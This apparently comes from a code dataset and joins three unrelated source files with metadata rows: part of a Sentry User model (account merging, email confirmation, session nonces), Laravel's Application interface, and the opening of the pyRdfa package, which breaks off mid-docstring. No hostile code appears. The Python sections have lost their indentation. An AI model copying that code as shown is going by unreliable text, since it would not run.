def delete(self):
if self.username == "sentry":
raise Exception('You cannot delete the "sentry" user as it is required by Sentry.')
avatar = self.avatar.first()
if avatar:
avatar.delete()
return super(User, self).delete()
def save(self, *args, **kwargs):
if not self.username:
self.username = self.email
return super(User, self).save(*args, **kwargs)
def has_perm(self, perm_name):
warnings.warn("User.has_perm is deprecated", DeprecationWarning)
return self.is_superuser
def has_module_perms(self, app_label):
warnings.warn("User.has_module_perms is deprecated", DeprecationWarning)
return self.is_superuser
def get_unverified_emails(self):
return self.emails.filter(is_verified=False)
def get_verified_emails(self):
return self.emails.filter(is_verified=True)
def has_unverified_emails(self):
return self.get_unverified_emails().exists()
def get_label(self):
return self.email or self.username or self.id
def get_display_name(self):
return self.name or self.email or self.username
def get_full_name(self):
return self.name
def get_short_name(self):
return self.username
def get_salutation_name(self):
name = self.name or self.username.split("@", 1)[0].split(".", 1)[0]
first_name = name.split(" ", 1)[0]
return first_name.capitalize()
def get_avatar_type(self):
avatar = self.avatar.first()
if avatar:
return avatar.get_avatar_type_display()
return "letter_avatar"
def send_confirm_email_singular(self, email, is_new_user=False):
from sentry import options
from sentry.utils.email import MessageBuilder
if not email.hash_is_valid():
email.set_hash()
email.save()
context = {
"user": self,
"url": absolute_uri(
reverse("sentry-account-confirm-email", args=[self.id, email.validation_hash])
),
"confirm_email": email.email,
"is_new_user": is_new_user,
}
msg = MessageBuilder(
subject="%sConfirm Email" % (options.get("mail.subject-prefix"),),
template="sentry/emails/confirm_email.txt",
html_template="sentry/emails/confirm_email.html",
type="user.confirm_email",
context=context,
)
msg.send_async([email.email])
def send_confirm_emails(self, is_new_user=False):
email_list = self.get_unverified_emails()
for email in email_list:
self.send_confirm_email_singular(email, is_new_user)
def merge_to(from_user, to_user):
# TODO: we could discover relations automatically and make this useful
from sentry import roles
from sentry.models import (
Activity,
AuditLogEntry,
AuthIdentity,
Authenticator,
GroupAssignee,
GroupBookmark,
GroupSeen,
GroupShare,
GroupSubscription,
Identity,
OrganizationMember,
OrganizationMemberTeam,
UserAvatar,
UserEmail,
UserOption,
)
audit_logger.info(
"user.merge", extra={"from_user_id": from_user.id, "to_user_id": to_user.id}
)
for obj in OrganizationMember.objects.filter(user=from_user):
try:
with transaction.atomic():
obj.update(user=to_user)
# this will error if both users are members of obj.org
except IntegrityError:
pass
# identify the highest priority membership
# only applies if both users are members of obj.org
# if roles are different, grants combined user the higher of the two
to_member = OrganizationMember.objects.get(
organization=obj.organization_id, user=to_user
)
if roles.get(obj.role).priority > roles.get(to_member.role).priority:
to_member.update(role=obj.role)
for team in obj.teams.all():
try:
with transaction.atomic():
OrganizationMemberTeam.objects.create(
organizationmember=to_member, team=team
)
# this will error if both users are on the same team in obj.org,
# in which case, no need to update anything
except IntegrityError:
pass
model_list = (
Authenticator,
GroupAssignee,
GroupBookmark,
GroupSeen,
GroupShare,
GroupSubscription,
Identity,
UserAvatar,
UserEmail,
UserOption,
)
for model in model_list:
for obj in model.objects.filter(user=from_user):
try:
with transaction.atomic():
obj.update(user=to_user)
except IntegrityError:
pass
Activity.objects.filter(user=from_user).update(user=to_user)
# users can be either the subject or the object of actions which get logged
AuditLogEntry.objects.filter(actor=from_user).update(actor=to_user)
AuditLogEntry.objects.filter(target_user=from_user).update(target_user=to_user)
# remove any SSO identities that exist on from_user that might conflict
# with to_user's existing identities (only applies if both users have
# SSO identities in the same org), then pass the rest on to to_user
AuthIdentity.objects.filter(
user=from_user,
auth_provider__organization__in=AuthIdentity.objects.filter(user=to_user).values(
"auth_provider__organization"
),
).delete()
AuthIdentity.objects.filter(user=from_user).update(user=to_user)
def set_password(self, raw_password):
super(User, self).set_password(raw_password)
self.last_password_change = timezone.now()
self.is_password_expired = False
def refresh_session_nonce(self, request=None):
from django.utils.crypto import get_random_string
self.session_nonce = get_random_string(12)
if request is not None:
request.session["_nonce"] = self.session_nonce
def get_orgs(self):
from sentry.models import Organization, OrganizationMember, OrganizationStatus
return Organization.objects.filter(
status=OrganizationStatus.VISIBLE,
id__in=OrganizationMember.objects.filter(user=self).values("organization"),
)
def get_orgs_require_2fa(self):
from sentry.models import Organization, OrganizationStatus
return Organization.objects.filter(
flags=models.F("flags").bitor(Organization.flags.require_2fa),
status=OrganizationStatus.VISIBLE,
member_set__user=self,
)
def clear_lost_passwords(self):
LostPasswordHash.objects.filter(user=self).delete()
# HACK(dcramer): last_login needs nullable for Django 1.8
User._meta.get_field("last_login").null = True
# When a user logs out, we want to always log them out of all
# sessions and refresh their nonce.
@receiver(user_logged_out, sender=User)
def refresh_user_nonce(sender, request, user, **kwargs):
if user is None:
return
user.refresh_session_nonce()
user.save(update_fields=["session_nonce"]) | unknown | codeparrot/codeparrot-clean | ||
<?php
namespace Illuminate\Contracts\Foundation;
use Illuminate\Contracts\Container\Container;
interface Application extends Container
{
/**
* Get the version number of the application.
*
* @return string
*/
public function version();
/**
* Get the base path of the Laravel installation.
*
* @param string $path
* @return string
*/
public function basePath($path = '');
/**
* Get the path to the bootstrap directory.
*
* @param string $path
* @return string
*/
public function bootstrapPath($path = '');
/**
* Get the path to the application configuration files.
*
* @param string $path
* @return string
*/
public function configPath($path = '');
/**
* Get the path to the database directory.
*
* @param string $path
* @return string
*/
public function databasePath($path = '');
/**
* Get the path to the language files.
*
* @param string $path
* @return string
*/
public function langPath($path = '');
/**
* Get the path to the public directory.
*
* @param string $path
* @return string
*/
public function publicPath($path = '');
/**
* Get the path to the resources directory.
*
* @param string $path
* @return string
*/
public function resourcePath($path = '');
/**
* Get the path to the storage directory.
*
* @param string $path
* @return string
*/
public function storagePath($path = '');
/**
* Get or check the current application environment.
*
* @param string|array ...$environments
* @return string|bool
*/
public function environment(...$environments);
/**
* Determine if the application is running in the console.
*
* @return bool
*/
public function runningInConsole();
/**
* Determine if the application is running unit tests.
*
* @return bool
*/
public function runningUnitTests();
/**
* Determine if the application is running with debug mode enabled.
*
* @return bool
*/
public function hasDebugModeEnabled();
/**
* Get an instance of the maintenance mode manager implementation.
*
* @return \Illuminate\Contracts\Foundation\MaintenanceMode
*/
public function maintenanceMode();
/**
* Determine if the application is currently down for maintenance.
*
* @return bool
*/
public function isDownForMaintenance();
/**
* Register all of the configured providers.
*
* @return void
*/
public function registerConfiguredProviders();
/**
* Register a service provider with the application.
*
* @param \Illuminate\Support\ServiceProvider|string $provider
* @param bool $force
* @return \Illuminate\Support\ServiceProvider
*/
public function register($provider, $force = false);
/**
* Register a deferred provider and service.
*
* @param string $provider
* @param string|null $service
* @return void
*/
public function registerDeferredProvider($provider, $service = null);
/**
* Resolve a service provider instance from the class name.
*
* @param string $provider
* @return \Illuminate\Support\ServiceProvider
*/
public function resolveProvider($provider);
/**
* Boot the application's service providers.
*
* @return void
*/
public function boot();
/**
* Register a new boot listener.
*
* @param callable $callback
* @return void
*/
public function booting($callback);
/**
* Register a new "booted" listener.
*
* @param callable $callback
* @return void
*/
public function booted($callback);
/**
* Run the given array of bootstrap classes.
*
* @param array $bootstrappers
* @return void
*/
public function bootstrapWith(array $bootstrappers);
/**
* Get the current application locale.
*
* @return string
*/
public function getLocale();
/**
* Get the application namespace.
*
* @return string
*
* @throws \RuntimeException
*/
public function getNamespace();
/**
* Get the registered service provider instances if any exist.
*
* @param \Illuminate\Support\ServiceProvider|string $provider
* @return array
*/
public function getProviders($provider);
/**
* Determine if the application has been bootstrapped before.
*
* @return bool
*/
public function hasBeenBootstrapped();
/**
* Load and boot all of the remaining deferred providers.
*
* @return void
*/
public function loadDeferredProviders();
/**
* Set the current application locale.
*
* @param string $locale
* @return void
*/
public function setLocale($locale);
/**
* Determine if middleware has been disabled for the application.
*
* @return bool
*/
public function shouldSkipMiddleware();
/**
* Register a terminating callback with the application.
*
* @param callable|string $callback
* @return \Illuminate\Contracts\Foundation\Application
*/
public function terminating($callback);
/**
* Terminate the application.
*
* @return void
*/
public function terminate();
} | php | github | https://github.com/laravel/framework | src/Illuminate/Contracts/Foundation/Application.php |
# -*- coding: utf-8 -*-
"""
RDFa 1.1 parser, also referred to as a “RDFa Distiller”. It is
deployed, via a CGI front-end, on the U{W3C RDFa 1.1 Distiller page<http://www.w3.org/2012/pyRdfa/>}.
For details on RDFa, the reader should consult the U{RDFa Core 1.1<http://www.w3.org/TR/rdfa-core/>}, U{XHTML+RDFa1.1<http://www.w3.org/TR/2010/xhtml-rdfa>}, and the U{RDFa 1.1 Lite<http://www.w3.org/TR/rdfa-lite/>} documents.
The U{RDFa 1.1 Primer<http://www.w3.org/TR/owl2-primer/>} may also prove helpful.
This package can also be downloaded U{from GitHub<https://github.com/RDFLib/pyrdfa3>}. The
distribution also includes the CGI front-end and a separate utility script to be run locally.
Note that this package is an updated version of a U{previous RDFa distiller<http://www.w3.org/2007/08/pyRdfa>} that was developed
for RDFa 1.0. Although it reuses large portions of that code, it has been quite thoroughly rewritten, hence put in a completely
different project. (The version numbering has been continued, though, to avoid any kind of misunderstandings. This version has version numbers "3.0.0" or higher.)
(Simple) Usage
==============
From a Python file, expecting a Turtle output::
from pyRdfa import pyRdfa
print pyRdfa().rdf_from_source('filename')
Other output formats are also possible. E.g., to produce RDF/XML output, one could use::
from pyRdfa import pyRdfa
print pyRdfa().rdf_from_source('filename', outputFormat='pretty-xml')
It is also possible to embed an RDFa processing. Eg, using::
from pyRdfa import pyRdfa
graph = pyRdfa().graph_from_source('filename')
returns an RDFLib.Graph object instead of a serialization thereof. See the the description of the
L{pyRdfa class<pyRdfa.pyRdfa>} for further possible entry points details.
There is also, as part of this module, a L{separate entry for CGI calls<processURI>}.
Return (serialization) formats
------------------------------
The package relies on RDFLib. By default, it relies therefore on the serializers coming with the local RDFLib distribution. However, there has been some issues with serializers of older RDFLib releases; also, some output formats, like JSON-LD, are not (yet) part of the standard RDFLib distribution. A companion package, called pyRdfaExtras, is part of the download, and it includes some of those extra serializers. The extra format (not part of the RDFLib core) is U{JSON-LD<http://json-ld.org/spec/latest/json-ld-syntax/>}, whose 'key' is 'json', when used in the 'parse' method of an RDFLib graph.
Options
=======
The package also implements some optional features that are not part of the RDFa recommendations. At the moment these are:
- possibility for plain literals to be normalized in terms of white spaces. Default: false. (The RDFa specification requires keeping the white spaces and leave applications to normalize them, if needed)
- inclusion of embedded RDF: Turtle content may be enclosed in a C{script} element and typed as C{text/turtle}, U{defined by the RDF Working Group<http://www.w3.org/TR/turtle/>}. Alternatively, some XML dialects (e.g., SVG) allows the usage of RDF/XML as part of their core content to define metadata in RDF. For both of these cases pyRdfa parses these serialized RDF content and adds the resulting triples to the output Graph. Default: true.
- extra, built-in transformers are executed on the DOM tree prior to RDFa processing (see below). These transformers can be provided by the end user.
Options are collected in an instance of the L{Options} class and may be passed to the processing functions as an extra argument. E.g., to allow the inclusion of embedded content::
from pyRdfa.options import Options
options = Options(embedded_rdf=True)
print pyRdfa(options=options).rdf_from_source('filename')
See the description of the L{Options} class for the details.
Host Languages
==============
RDFa 1.1. Core is defined for generic XML; there are specific documents to describe how the generic specification is applied to
XHTML and HTML5.
pyRdfa makes an automatic switch among these based on the content type of the source as returned by an HTTP request. The following are the
possible host languages:
- if the content type is C{text/html}, the content is HTML5
- if the content type is C{application/xhtml+xml} I{and} the right DTD is used, the content is XHTML1
- if the content type is C{application/xhtml+xml} and no or an unknown DTD is used, the content is XHTML5
- if the content type is C{application/svg+xml}, the content type is SVG
- if the content type is C{application/atom+xml}, the content type is SVG
- if the content type is C{application/xml} or C{application/xxx+xml} (but 'xxx' is not 'atom' or 'svg'), the content type is XML
If local files are used, pyRdfa makes a guess on the content type based on the file name suffix: C{.html} is for HTML5, C{.xhtml} for XHTML1, C{.svg} for SVG, anything else is considered to be general XML. Finally, the content type may be set by the caller when initializing the L{pyRdfa class<pyRdfa.pyRdfa>}.
Beyond the differences described in the RDFa specification, the main difference is the parser used to parse the source. In the case of HTML5, pyRdfa uses an U{HTML5 parser<http://code.google.com/p/html5lib/>}; for all other cases the simple XML parser, part of the core Python environment, is used. This may be significant in the case of erronuous sources: indeed, the HTML5 parser may do adjustments on
the DOM tree before handing it over to the distiller. Furthermore, SVG is also recognized as a type that allows embedded RDF in the form of RDF/XML.
See the variables in the L{host} module if a new host language is added to the system. The current host language information is available for transformers via the option argument, too, and can be used to control the effect of the transformer.
Vocabularies
============
RDFa 1.1 has the notion of vocabulary files (using the C{@vocab} attribute) that may be used to expand the generated RDF graph. Expansion is based on some very simply RDF Schema and OWL statements on sub-properties and sub-classes, and equivalences.
pyRdfa implements this feature, although it does not do this by default. The extra C{vocab_expansion} parameter should be used for this extra step, for example::
from pyRdfa.options import Options
options = Options(vocab_expansion=True)
print pyRdfa(options=options).rdf_from_source('filename')
The triples in the vocabulary files themselves (i.e., the small ontology in RDF Schema and OWL) are removed from the result, leaving the inferred property and type relationships only (additionally to the “core” RDF content).
Vocabulary caching
------------------
By default, pyRdfa uses a caching mechanism instead of fetching the vocabulary files each time their URI is met as a C{@vocab} attribute value. (This behavior can be switched off setting the C{vocab_cache} option to false.)
Caching happens in a file system directory. The directory itself is determined by the platform the tool is used on, namely:
- On Windows, it is the C{pyRdfa-cache} subdirectory of the C{%APPDATA%} environment variable
- On MacOS, it is the C{~/Library/Application Support/pyRdfa-cache}
- Otherwise, it is the C{~/.pyRdfa-cache}
This automatic choice can be overridden by the C{PyRdfaCacheDir} environment variable.
Caching can be set to be read-only, i.e., the setup might generate the cache files off-line instead of letting the tool writing its own cache when operating, e.g., as a service on the Web. This can be achieved by making the cache directory read only.
If the directories are neither readable nor writable, the vocabulary files are retrieved via HTTP every time they are hit. This may slow down processing, it is advised to avoid such a setup for the package.
The cache includes a separate index file and a file for each vocabulary file. Cache control is based upon the C{EXPIRES} header of a vocabulary file’s HTTP return header: when first seen, this data is stored in the index file and controls whether the cache has to be renewed or not. If the HTTP return header does not have this entry, the date is artificially set ot the current date plus one day.
(The cache files themselves are dumped and loaded using U{Python’s built in cPickle package<http://docs.python.org/release/2.7/library/pickle.html#module-cPickle>}. These are binary files. Care should be taken if they are managed by CVS: they must be declared as binary files when adding them to the repository.)
RDFa 1.1 vs. RDFa 1.0
=====================
Unfortunately, RDFa 1.1 is I{not} fully backward compatible with RDFa 1.0, meaning that, in a few cases, the triples generated from an RDFa 1.1 source are not the same as for RDFa 1.0. (See the separate U{section in the RDFa 1.1 specification<http://www.w3.org/TR/rdfa-core/#major-differences-with-rdfa-syntax-1.0>} for some further details.)
This distiller’s default behavior is RDFa 1.1. However, if the source includes, in the top element of the file (e.g., the C{html} element) a C{@version} attribute whose value contains the C{RDFa 1.0} string, then the distiller switches to a RDFa 1.0 mode. (Although the C{@version} attribute is not required in RDFa 1.0, it is fairly commonly used.) Similarly, if the RDFa 1.0 DTD is used in the XHTML source, it will be taken into account (a very frequent setup is that an XHTML file is defined with that DTD and is served as text/html; pyRdfa will consider that file as XHTML5, i.e., parse it with the HTML5 parser, but interpret the RDFa attributes under the RDFa 1.0 rules).
Transformers
============
The package uses the concept of 'transformers': the parsed DOM tree is possibly
transformed I{before} performing the real RDFa processing. This transformer structure makes it possible to
add additional 'services' without distoring the core code of RDFa processing.
A transformer is a function with three arguments:
- C{node}: a DOM node for the top level element of the DOM tree
- C{options}: the current L{Options} instance
- C{state}: the current L{ExecutionContext} instance, corresponding to the top level DOM Tree element
The function may perform any type of change on the DOM tree; the typical behaviour is to add or remove attributes on specific elements. Some transformations are included in the package and can be used as examples; see the L{transform} module of the distribution. These are:
- The C{@name} attribute of the C{meta} element is copied into a C{@property} attribute of the same element
- Interpreting the 'openid' references in the header. See L{transform.OpenID} for further details.
- Implementing the Dublin Core dialect to include DC statements from the header. See L{transform.DublinCore} for further details.
The user of the package may refer add these transformers to L{Options} instance. Here is a possible usage with the “openid” transformer added to the call::
from pyRdfa.options import Options
from pyRdfa.transform.OpenID import OpenID_transform
options = Options(transformers=[OpenID_transform])
print pyRdfa(options=options).rdf_from_source('filename')
@summary: RDFa parser (distiller)
@requires: Python version 2.5 or up; 2.7 is preferred
@requires: U{RDFLib<http://rdflib.net>}; version 3.X is preferred.
@requires: U{html5lib<http://code.google.com/p/html5lib/>} for the HTML5 parsing.
@requires: U{httpheader<http://deron.meranda.us/python/httpheader/>}; however, a small modification had to make on the original file, so for this reason and to make distribution easier this module (single file) is added to the package.
@organization: U{World Wide Web Consortium<http://www.w3.org>}
@author: U{Ivan Herman<a href="http://www.w3.org/People/Ivan/">}
@license: This software is available for use under the
U{W3C® SOFTWARE NOTICE AND LICENSE<href="http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231">}
@copyright: W3C
@var builtInTransformers: List of built-in transformers that are to be run regardless, because they are part of the RDFa spec
@var CACHE_DIR_VAR: Environment variable used to define cache directories for RDFa vocabularies in case the default setting does not work or is not appropriate.
@var rdfa_current_version: Current "official" version of RDFa that this package implements by default. This can be changed at the invocation of the package
@var uri_schemes: List of registered (or widely used) URI schemes; used for warnings...
"""
"""
$Id: __init__.py,v 1.91 2013-10-16 11:48:54 ivan Exp $
"""
__version__ = "3.4.3"
__author__ = 'Ivan Herman'
__contact__ = 'Ivan Herman, ivan@w3.org'
__license__ = 'W3C® SOFTWARE NOTICE AND LICENSE, http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231'
import sys
PY3 = (sys.version_info[0] >= 3)
if PY3 :
from io import StringIO
else :
from io import StringIO
import os
import xml.dom.minidom
if PY3 :
from urllib.parse import urlparse
else :
from urllib.parse import urlparse
import rdflib
from rdflib import URIRef
from rdflib import Literal
from rdflib import BNode
from rdflib import Namespace
if rdflib.__version__ >= "3.0.0" :
from rdflib import RDF as ns_rdf
from rdflib import RDFS as ns_rdfs
from rdflib import Graph
else :
from rdflib.RDFS import RDFSNS as ns_rdfs
from rdflib.RDF import RDFNS as ns_rdf
from rdflib.Graph import Graph
import logging
logger = logging.getLogger(__name__)
# Namespace, in the RDFLib sense, for the rdfa vocabulary
ns_rdfa = Namespace("http://www.w3.org/ns/rdfa#")
from .extras.httpheader import acceptable_content_type, content_type
from .transform.prototype import handle_prototypes
# Vocabulary terms for vocab reporting
RDFA_VOCAB = ns_rdfa["usesVocabulary"]
# Namespace, in the RDFLib sense, for the XSD Datatypes
ns_xsd = Namespace('http://www.w3.org/2001/XMLSchema#')
# Namespace, in the RDFLib sense, for the distiller vocabulary, used as part of the processor graph
ns_distill = Namespace("http://www.w3.org/2007/08/pyRdfa/vocab#")
debug = False
#########################################################################################################
# Exception/error handling. Essentially, all the different exceptions are re-packaged into
# separate exception class, to allow for an easier management on the user level
class RDFaError(Exception) :
"""Superclass exceptions representing error conditions defined by the RDFa 1.1 specification.
It does not add any new functionality to the
Exception class."""
def __init__(self, msg) :
self.msg = msg
Exception.__init__(self)
class FailedSource(RDFaError) :
"""Raised when the original source cannot be accessed. It does not add any new functionality to the
Exception class."""
def __init__(self, msg, http_code = None) :
self.msg = msg
self.http_code = http_code
RDFaError.__init__(self, msg)
class HTTPError(RDFaError) :
"""Raised when HTTP problems are detected. It does not add any new functionality to the
Exception class."""
def __init__(self, http_msg, http_code) :
self.msg = http_msg
self.http_code = http_code
RDFaError.__init__(self,http_msg)
class ProcessingError(RDFaError) :
"""Error found during processing. It does not add any new functionality to the
Exception class."""
pass
class pyRdfaError(Exception) :
"""Superclass exceptions representing error conditions outside the RDFa 1.1 specification."""
pass
# Error and Warning RDFS classes
RDFA_Error = ns_rdfa["Error"]
RDFA_Warning = ns_rdfa["Warning"]
RDFA_Info = ns_rdfa["Information"]
NonConformantMarkup = ns_rdfa["DocumentError"]
UnresolvablePrefix = ns_rdfa["UnresolvedCURIE"]
UnresolvableReference = ns_rdfa["UnresolvedCURIE"]
UnresolvableTerm = ns_rdfa["UnresolvedTerm"]
VocabReferenceError = ns_rdfa["VocabReferenceError"]
PrefixRedefinitionWarning = ns_rdfa["PrefixRedefinition"]
FileReferenceError = ns_distill["FileReferenceError"]
HTError = ns_distill["HTTPError"]
IncorrectPrefixDefinition = ns_distill["IncorrectPrefixDefinition"]
IncorrectBlankNodeUsage = ns_distill["IncorrectBlankNodeUsage"]
IncorrectLiteral = ns_distill["IncorrectLiteral"]
# Error message texts
err_no_blank_node = "Blank node in %s position is not allowed; ignored"
err_redefining_URI_as_prefix = "'%s' a registered or an otherwise used URI scheme, but is defined as a prefix here; is this a mistake? (see, eg, http://en.wikipedia.org/wiki/URI_scheme or http://www.iana.org/assignments/uri-schemes.html for further information for most of the URI schemes)"
err_xmlns_deprecated = "The usage of 'xmlns' for prefix definition is deprecated; please use the 'prefix' attribute instead (definition for '%s')"
err_bnode_local_prefix = "The '_' local CURIE prefix is reserved for blank nodes, and cannot be defined as a prefix"
err_col_local_prefix = "The character ':' is not valid in a CURIE Prefix, and cannot be used in a prefix definition (definition for '%s')"
err_missing_URI_prefix = "Missing URI in prefix declaration for '%s' (in '%s')"
err_invalid_prefix = "Invalid prefix declaration '%s' (in '%s')"
err_no_default_prefix = "Default prefix cannot be changed (in '%s')"
err_prefix_and_xmlns = "@prefix setting for '%s' overrides the 'xmlns:%s' setting; may be a source of problem if same file is run through RDFa 1.0"
err_non_ncname_prefix = "Non NCNAME '%s' in prefix definition (in '%s'); ignored"
err_absolute_reference = "CURIE Reference part contains an authority part: %s (in '%s'); ignored"
err_query_reference = "CURIE Reference query part contains an unauthorized character: %s (in '%s'); ignored"
err_fragment_reference = "CURIE Reference fragment part contains an unauthorized character: %s (in '%s'); ignored"
err_lang = "There is a problem with language setting; either both xml:lang and lang used on an element with different values, or, for (X)HTML5, only xml:lang is used."
err_URI_scheme = "Unusual URI scheme used in <%s>; may that be a mistake, e.g., resulting from using an undefined CURIE prefix or an incorrect CURIE?"
err_illegal_safe_CURIE = "Illegal safe CURIE: %s; ignored"
err_no_CURIE_in_safe_CURIE = "Safe CURIE is used, but the value does not correspond to a defined CURIE: [%s]; ignored"
err_undefined_terms = "'%s' is used as a term, but has not been defined as such; ignored"
err_non_legal_CURIE_ref = "Relative URI is not allowed in this position (or not a legal CURIE reference) '%s'; ignored"
err_undefined_CURIE = "Undefined CURIE: '%s'; ignored"
err_prefix_redefinition = "Prefix '%s' (defined in the initial RDFa context or in an ancestor) is redefined"
err_unusual_char_in_URI = "Unusual character in uri: %s; possible error?"
#############################################################################################
from .state import ExecutionContext
from .parse import parse_one_node
from .options import Options
from .transform import top_about, empty_safe_curie, vocab_for_role
from .utils import URIOpener
from .host import HostLanguage, MediaTypes, preferred_suffixes, content_to_host_language
# Environment variable used to characterize cache directories for RDFa vocabulary files.
CACHE_DIR_VAR = "PyRdfaCacheDir"
# current "official" version of RDFa that this package implements. This can be changed at the invocation of the package
rdfa_current_version = "1.1"
# I removed schemes that would not appear as a prefix anyway, like iris.beep
# http://en.wikipedia.org/wiki/URI_scheme seems to be a good source of information
# as well as http://www.iana.org/assignments/uri-schemes.html
# There are some overlaps here, but better more than not enough...
# This comes from wikipedia
registered_iana_schemes = [
"aaa","aaas","acap","cap","cid","crid","data","dav","dict","dns","fax","file", "ftp","geo","go",
"gopher","h323","http","https","iax","icap","im","imap","info","ipp","iris","ldap", "lsid",
"mailto","mid","modem","msrp","msrps", "mtqp", "mupdate","news","nfs","nntp","opaquelocktoken",
"pop","pres", "prospero","rstp","rsync", "service","shttp","sieve","sip","sips", "sms", "snmp", "soap", "tag",
"tel","telnet", "tftp", "thismessage","tn3270","tip","tv","urn","vemmi","wais","ws", "wss", "xmpp"
]
# This comes from wikipedia, too
unofficial_common = [
"about", "adiumxtra", "aim", "apt", "afp", "aw", "bitcoin", "bolo", "callto", "chrome", "coap",
"content", "cvs", "doi", "ed2k", "facetime", "feed", "finger", "fish", "git", "gg",
"gizmoproject", "gtalk", "irc", "ircs", "irc6", "itms", "jar", "javascript",
"keyparc", "lastfm", "ldaps", "magnet", "maps", "market", "message", "mms",
"msnim", "mumble", "mvn", "notes", "palm", "paparazzi", "psync", "rmi",
"secondlife", "sgn", "skype", "spotify", "ssh", "sftp", "smb", "soldat",
"steam", "svn", "teamspeak", "things", "udb", "unreal", "ut2004",
"ventrillo", "view-source", "webcal", "wtai", "wyciwyg", "xfire", "xri", "ymsgr"
]
# These come from the IANA page
historical_iana_schemes = [
"fax", "mailserver", "modem", "pack", "prospero", "snews", "videotex", "wais"
]
provisional_iana_schemes = [
"afs", "dtn", "dvb", "icon", "ipn", "jms", "oid", "rsync", "ni"
]
other_used_schemes = [
"hdl", "isbn", "issn", "mstp", "rtmp", "rtspu", "stp"
]
uri_schemes = registered_iana_schemes + unofficial_common + historical_iana_schemes + provisional_iana_schemes + other_used_schemes
# List of built-in transformers that are to be run regardless, because they are part of the RDFa spec
builtInTransformers = [
empty_safe_curie, top_about, vocab_for_role
]
#########################################################################################################
class pyRdfa :
"""Main processing class for the distiller
@ivar options: an instance of the L{Options} class
@ivar media_type: the preferred default media type, possibly set at initialization
@ivar base: the base value, possibly set at initialization
@ivar http_status: HTTP Status, to be returned when the package is used via a CGI entry. Initially set to 200, may be modified by exception handlers
"""
def __init__(self, options = None, base = "", media_type = "", rdfa_version = None) :
"""
@keyword options: Options for the distiller
@type options: L{Options}
@keyword base: URI for the default "base" value (usually the URI of the file to be processed)
@keyword media_type: explicit setting of the preferred media type (a.k.a. content type) of the the RDFa source
@keyword rdfa_version: the RDFa version that should be used. If not set, the value of the global L{rdfa_current_version} variable is used
"""
self.http_status = 200
self.base = base
if base == "" :
self.required_base = None
else :
self.required_base = base
self.charset = None
# predefined content type
self.media_type = media_type
if options == None :
self.options = Options()
else :
self.options = options
if media_type != "" :
self.options.set_host_language(self.media_type)
if rdfa_version is not None :
self.rdfa_version = rdfa_version
else :
self.rdfa_version = None
def _get_input(self, name) :
"""
Trying to guess whether "name" is a URI or a string (for a file); it then tries to open this source accordingly,
returning a file-like object. If name is none of these, it returns the input argument (that should
be, supposedly, a file-like object already).
If the media type has not been set explicitly at initialization of this instance,
the method also sets the media_type based on the HTTP GET response or the suffix of the file. See
L{host.preferred_suffixes} for the suffix to media type mapping.
@param name: identifier of the input source
@type name: string or a file-like object
@return: a file like object if opening "name" is possible and successful, "name" otherwise
"""
try :
# Python 2 branch
isstring = isinstance(name, str)
except :
# Python 3 branch
isstring = isinstance(name, str)
try :
if isstring :
# check if this is a URI, ie, if there is a valid 'scheme' part
# otherwise it is considered to be a simple file
if urlparse(name)[0] != "" :
url_request = URIOpener(name)
self.base = url_request.location
if self.media_type == "" :
if url_request.content_type in content_to_host_language :
self.media_type = url_request.content_type
else :
self.media_type = MediaTypes.xml
self.options.set_host_language(self.media_type)
self.charset = url_request.charset
if self.required_base == None :
self.required_base = name
return url_request.data
else :
# Creating a File URI for this thing
if self.required_base == None :
self.required_base = "file://" + os.path.join(os.getcwd(),name)
if self.media_type == "" :
self.media_type = MediaTypes.xml
# see if the default should be overwritten
for suffix in preferred_suffixes :
if name.endswith(suffix) :
self.media_type = preferred_suffixes[suffix]
self.charset = 'utf-8'
break
self.options.set_host_language(self.media_type)
return open(name, 'rb')
else :
return name
except HTTPError :
raise sys.exc_info()[1]
except :
(type, value, traceback) = sys.exc_info()
raise FailedSource(value)
####################################################################################################################
# Externally used methods
#
def graph_from_DOM(self, dom, graph = None, pgraph = None) :
"""
Extract the RDF Graph from a DOM tree. This is where the real processing happens. All other methods get down to this
one, eventually (e.g., after opening a URI and parsing it into a DOM).
@param dom: a DOM Node element, the top level entry node for the whole tree (i.e., the C{dom.documentElement} is used to initiate processing down the node hierarchy)
@keyword graph: an RDF Graph (if None, than a new one is created)
@type graph: rdflib Graph instance.
@keyword pgraph: an RDF Graph to hold (possibly) the processor graph content. If None, and the error/warning triples are to be generated, they will be added to the returned graph. Otherwise they are stored in this graph.
@type pgraph: rdflib Graph instance
@return: an RDF Graph
@rtype: rdflib Graph instance
"""
def copyGraph(tog, fromg) :
for t in fromg :
tog.add(t)
for k,ns in fromg.namespaces() :
tog.bind(k,ns)
if graph == None :
# Create the RDF Graph, that will contain the return triples...
graph = Graph()
# this will collect the content, the 'default graph', as called in the RDFa spec
default_graph = Graph()
# get the DOM tree
topElement = dom.documentElement
# Create the initial state. This takes care of things
# like base, top level namespace settings, etc.
state = ExecutionContext(topElement, default_graph, base=self.required_base if self.required_base != None else "", options=self.options, rdfa_version=self.rdfa_version)
# Perform the built-in and external transformations on the HTML tree.
logger.info(self.options)
for trans in self.options.transformers + builtInTransformers :
trans(topElement, self.options, state)
# This may have changed if the state setting detected an explicit version information:
self.rdfa_version = state.rdfa_version
# The top level subject starts with the current document; this
# is used by the recursion
# this function is the real workhorse
parse_one_node(topElement, default_graph, None, state, [])
# Massage the output graph in term of rdfa:Pattern and rdfa:copy
handle_prototypes(default_graph)
# If the RDFS expansion has to be made, here is the place...
if self.options.vocab_expansion :
from .rdfs.process import process_rdfa_sem
process_rdfa_sem(default_graph, self.options)
# Experimental feature: nothing for now, this is kept as a placeholder
if self.options.experimental_features :
pass
# What should be returned depends on the way the options have been set up
if self.options.output_default_graph :
copyGraph(graph, default_graph)
if self.options.output_processor_graph :
if pgraph != None :
copyGraph(pgraph, self.options.processor_graph.graph)
else :
copyGraph(graph, self.options.processor_graph.graph)
elif self.options.output_processor_graph :
if pgraph != None :
copyGraph(pgraph, self.options.processor_graph.graph)
else :
copyGraph(graph, self.options.processor_graph.graph)
# this is necessary if several DOM trees are handled in a row...
self.options.reset_processor_graph()
return graph
def graph_from_source(self, name, graph = None, rdfOutput = False, pgraph = None) :
"""
Extract an RDF graph from an RDFa source. The source is parsed, the RDF extracted, and the RDFa Graph is
returned. This is a front-end to the L{pyRdfa.graph_from_DOM} method.
@param name: a URI, a file name, or a file-like object
@param graph: rdflib Graph instance. If None, a new one is created.
@param pgraph: rdflib Graph instance for the processor graph. If None, and the error/warning triples are to be generated, they will be added to the returned graph. Otherwise they are stored in this graph.
